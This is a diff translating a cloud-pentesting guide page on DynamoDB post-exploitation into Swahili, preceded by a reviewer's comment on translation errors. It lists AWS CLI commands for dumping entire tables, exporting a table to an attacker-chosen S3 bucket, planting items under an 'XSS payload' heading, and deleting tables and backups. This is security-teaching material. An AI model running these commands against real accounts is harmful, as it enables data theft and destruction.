+"UnshareInterval": 30,
+"UnshareIntervalUnit": "DAYS"
+}
+]
+}
+],
+"Parameters": {
+"ExcludeBootVolume": false
+}
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
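Review bot: two wording errors in the translated first paragraph change its meaning: "kuhamasisha" means to motivate or mobilise, so the source "transferring the encrypted snapshots to a different account" needs "kuhamisha"; and "kuficha" / "ufichaji" means to hide, whereas "encrypting" / "encryption status" is conventionally "kusimba" / "usimbaji fiche" in Swahili technical text. With "kuficha" a reader cannot distinguish encrypted snapshots from merely hidden ones, which is the point of the ransomware scenario the paragraph describes. Separately, the policy document from `+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",` onward has lost all indentation; it is still valid JSON, but with the fence already mis-tagged as `bash` the flattened nesting makes `Schedules`, `CrossRegionCopyRules` and `ShareRules` hard to follow, so keep the original indentation (and consider tagging the fence `json`).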
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index d63689d9e..6e66066a8 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -4,7 +4,7 @@
## DynamoDB
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+Mshambuliaji mwenye ruhusa hii ataweza **kupata vitu kutoka kwa meza kwa ufunguo wa msingi** (huwezi tu kuomba data zote za meza). Hii inamaanisha kuwa unahitaji kujua funguo za msingi (unaweza kupata hii kwa kupata metadata ya meza (`describe-table`).
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
- "ProductCatalog" : { // This is the table name
- "Keys": [
- {
- "Id" : { // Primary keys name
- "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
- }
- }
- ]
- }
+"ProductCatalog" : { // This is the table name
+"Keys": [
+{
+"Id" : { // Primary keys name
+"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+}
+}
+]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb batch-get-item \
- --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
- --region
+--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:GetItem`
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
-
+**Kama ruhusa za awali** hii inamruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutolewa kwa ufunguo wa msingi wa kipengee cha kupata:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
- "N": "205"
+"N": "205"
}
}
```
-
-With this permission it's also possible to use the **`transact-get-items`** method like:
-
+Na ruhusa hii, pia inawezekana kutumia njia ya **`transact-get-items`** kama:
```json
aws dynamodb transact-get-items \
- --transact-items file:///tmp/a.json
+--transact-items file:///tmp/a.json
// With a.json
[
- {
- "Get": {
- "Key": {
- "Id": {"N": "205"}
- },
- "TableName": "ProductCatalog"
- }
- }
+{
+"Get": {
+"Key": {
+"Id": {"N": "205"}
+},
+"TableName": "ProductCatalog"
+}
+}
]
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Query`
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**Kama ruhusa za awali** hii inaruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutumia ufunguo wa msingi wa kipengee kinachopaswa kupatikana. Inaruhusu kutumia [sehemu ya kulinganisha](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), lakini kulinganisha pekee linaloruhusiwa na ufunguo wa msingi (ambalo lazima lionekane) ni "EQ", hivyo huwezi kutumia kulinganisha kupata DB nzima katika ombi.
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
- // With a.json
- {
+// With a.json
+{
"Id" : {
- "ComparisonOperator":"EQ",
- "AttributeValueList": [ {"N": "205"} ]
- }
+"ComparisonOperator":"EQ",
+"AttributeValueList": [ {"N": "205"} ]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb query \
- --table-name TargetTable \
- --key-condition-expression "AttributeName = :value" \
- --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
- --region
+--table-name TargetTable \
+--key-condition-expression "AttributeName = :value" \
+--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Scan`
-You can use this permission to **dump the entire table easily**.
-
+Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb scan --table-name #Get data inside the table
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:PartiQLSelect`
-You can use this permission to **dump the entire table easily**.
-
+Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb execute-statement \
- --statement "SELECT * FROM ProductCatalog"
+--statement "SELECT * FROM ProductCatalog"
```
-
-This permission also allow to perform `batch-execute-statement` like:
-
+Hii ruhusa pia inaruhusu kutekeleza `batch-execute-statement` kama:
```bash
aws dynamodb batch-execute-statement \
- --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
+lakini unahitaji kubainisha ufunguo wa msingi na thamani, hivyo siyo faida sana.
-but you need to specify the primary key with a value, so it isn't that useful.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
-
+Ruhusa hii itamruhusu mshambuliaji **kutoa jedwali lote kwenye kikasha cha S3** alichokichagua:
```bash
aws dynamodb export-table-to-point-in-time \
- --table-arn arn:aws:dynamodb:::table/TargetTable \
- --s3-bucket \
- --s3-prefix \
- --export-time \
- --region
+--table-arn arn:aws:dynamodb:::table/TargetTable \
+--s3-bucket \
+--s3-prefix \
+--export-time \
+--region
```
-
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
-
+Kumbuka kwamba ili hii ifanye kazi, jedwali linahitaji kuwa na point-in-time-recovery iliyoanzishwa, unaweza kuangalia kama jedwali lina hiyo kwa:
```bash
aws dynamodb describe-continuous-backups \
- --table-name
+--table-name
```
-
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
-
+Ikiwa haijawashwa, utahitaji **kuwasha** na kwa hiyo unahitaji ruhusa **`dynamodb:ExportTableToPointInTime`**:
```bash
aws dynamodb update-continuous-backups \
- --table-name \
- --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+--table-name \
+--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
-
+Kwa ruhusa hizi, mshambuliaji angeweza **kuunda jedwali jipya kutoka kwa nakala ya akiba** (au hata kuunda nakala ya akiba ili kisha aifufue katika jedwali tofauti). Kisha, kwa ruhusa zinazohitajika, angeweza kuangalia **taarifa** kutoka kwa akiba ambazo haziwezi kuwa tena katika jedwali la uzalishaji.
```bash
aws dynamodb restore-table-from-backup \
- --backup-arn \
- --target-table-name \
- --region
+--backup-arn \
+--target-table-name \
+--region
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika nakala ya meza
### `dynamodb:PutItem`
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+Ruhusa hii inawawezesha watumiaji kuongeza **kitu kipya kwenye meza au kubadilisha kitu kilichopo** na kitu kipya. Ikiwa kitu chenye ufunguo wa msingi sawa tayari kipo, **kitu chote kitabadilishwa** na kitu kipya. Ikiwa ufunguo wa msingi haupo, kitu kipya chenye ufunguo wa msingi ulioainishwa kitaundwa **.**
{{#tabs }}
{{#tab name="XSS Example" }}
-
```bash
## Create new item with XSS payload
aws dynamodb put-item --table --item file://add.json
### With add.json:
{
- "Id": {
- "S": "1000"
- },
- "Name": {
- "S": "Marc"
- },
- "Description": {
- "S": ""
- }
+"Id": {
+"S": "1000"
+},
+"Name": {
+"S": "Marc"
+},
+"Description": {
+"S": ""
+}
}
```
-
{{#endtab }}
{{#tab name="AI Example" }}
-
```bash
aws dynamodb put-item \
- --table-name ExampleTable \
- --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
- --region
+--table-name ExampleTable \
+--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Madhara Yanayoweza Kutokea:** Ukatili wa udhaifu zaidi/kuvunjika kwa sheria kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:UpdateItem`
-This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+Ruhusa hii inawaruhusu watumiaji **kubadilisha sifa zilizopo za kipengee au kuongeza sifa mpya kwa kipengee**. Haifanyi **mabadiliko** ya kipengee chote; inasasisha tu sifa zilizotajwa. Ikiwa funguo kuu haipo katika jedwali, operesheni itafanya **kuunda kipengee kipya** chenye funguo kuu iliyotajwa na kuweka sifa zilizotajwa katika muktadha wa sasisho.
{{#tabs }}
{{#tab name="XSS Example" }}
-
```bash
## Update item with XSS payload
aws dynamodb update-item --table \
- --key file://key.json --update-expression "SET Description = :value" \
- --expression-attribute-values file://val.json
+--key file://key.json --update-expression "SET Description = :value" \
+--expression-attribute-values file://val.json
### With key.json:
{
- "Id": {
- "S": "1000"
- }
+"Id": {
+"S": "1000"
+}
}
### and val.json
{
- ":value": {
- "S": ""
- }
+":value": {
+"S": ""
+}
}
```
-
{{#endtab }}
{{#tab name="AI Example" }}
-
```bash
aws dynamodb update-item \
- --table-name ExampleTable \
- --key '{"Id": {"S": "1"}}' \
- --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
- --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
- --region
+--table-name ExampleTable \
+--key '{"Id": {"S": "1"}}' \
+--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
+--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Madhara Yanayoweza Kutokea:** Kutumiwa kwa udhaifu/kuvunjwa zaidi kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:DeleteTable`
-An attacker with this permission can **delete a DynamoDB table, causing data loss**.
-
+Mshambuliaji mwenye ruhusa hii anaweza **kufuta jedwali la DynamoDB, na kusababisha kupoteza data**.
```bash
aws dynamodb delete-table \
- --table-name TargetTable \
- --region
+--table-name TargetTable \
+--region
```
-
-**Potential impact**: Data loss and disruption of services relying on the deleted table.
+**Madhara yanayoweza kutokea**: Kupoteza data na kuingiliwa kwa huduma zinazotegemea meza iliyofutwa.
### `dynamodb:DeleteBackup`
-An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
-
+Mshambuliaji mwenye ruhusa hii anaweza **kufuta nakala ya akiba ya DynamoDB, ambayo inaweza kusababisha kupoteza data katika hali ya kuokoa dharura**.
```bash
aws dynamodb delete-backup \
- --backup-arn arn:aws:dynamodb: